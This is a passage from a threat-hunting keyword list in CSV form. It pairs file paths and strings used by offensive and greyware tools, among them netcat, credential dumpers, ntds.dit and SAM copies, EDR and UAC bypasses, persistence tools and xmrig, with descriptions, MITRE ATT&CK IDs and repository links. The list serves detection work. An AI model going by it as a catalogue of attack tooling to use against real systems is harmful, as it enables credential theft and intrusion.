Exfiltration","https://github.com/megous/megatools","1","0","N/A","9",,"N/A",,, +"*\Users\Public\*.dmp*","greyware_tool_keyword","procdump","Dump files might contain sensitive data and are often created as part of debugging processes or by attackers exfiltrating data. Users\Public should not be used","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\Users\Public\*ntds.dit*","greyware_tool_keyword","wmic","this file shouldn't be found in the Users\Public directory. 
Its presence could be a sign of an ongoing or past attack.","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\Users\Public\*ntds.jfm*","greyware_tool_keyword","wmic","Like the ntds.dit file it should not normally be found in this directory.","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\Users\Public\nc.exe*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","0","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" +"*\users\public\sam.save*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*\users\public\system.save*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*\Users\Public\termsrv.dll*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense 
Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" +"*\Users_Nochangedpassword.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\uTorrent\*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\utweb.exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. 
Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\UUID_bypass.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*\veeam_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\wce32.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" +"*\wce64.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" +"*\wce-beta.zip*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" +"*\wdextract.cpp*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - 
TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*\wdextract.sln*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*\wdextract.vcxproj*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*\wdextract32.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*\wdextract64.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*\wdigest.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\WdigestOffsets.csv*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result 
without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*\web_delivery.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\webdav.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\WfpTokenDup.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*\whatlicense-main\*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" +"*\WheresMyImplant*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - 
T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*\while_dll_ms*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\whoami.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\Windows\Prefetch\PSEXEC*","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. 
or the execution of malicious payloads.","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*\Windows\Tasks\Certipy*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*\Windows\Tasks\p4yl0ad*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" +"*\Windows\Temp\creds.db*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" +"*\windows\temp\ncat.exe -nv *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*\windows\temp\pwned.trx*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*\Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*\WindowsShareFinder.cs*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*\Win-PS2EXE*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*\WinRing0x64.sys*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*\winscp_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - 
TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\WiperPoc.cpp*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*\wireless.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\wl_log.txt*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" +"*\wl-lic.exe*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" +"*\wl-lic.pdb*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" +"*\wmi_1.dll*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*\wmi_2.dll*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*\WritebleRegistryKeys.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*\ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*\WSPCoerce.cs*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"*\x44\x8b\x01\x44\x39\x42*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" 
+"*\x64\Release\indirect.exe *","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" +"*\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*\x8b\x31\x39\x72\x10\x75*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*\xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*\xmrig.exe*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*\xmrig-6.20.0*","greyware_tool_keyword","xmrig","CPU/GPU 
cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*\xmrig-master*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*\XOR_b64_encrypted\*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*\xorencrypt.py*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*\ysoserial\*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*\zerologon.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 
- T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*] Eventviewer Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] Extension Hijacking Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] Found non-ASCII service: *","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*] Powershell Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] Screensaver Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] Startup Persistence 
created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] UserInitMprLogonScript Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access 
control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*_adAclOutput*.xlsx*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*_backdoor.exe*","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" +"*_backdoor.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
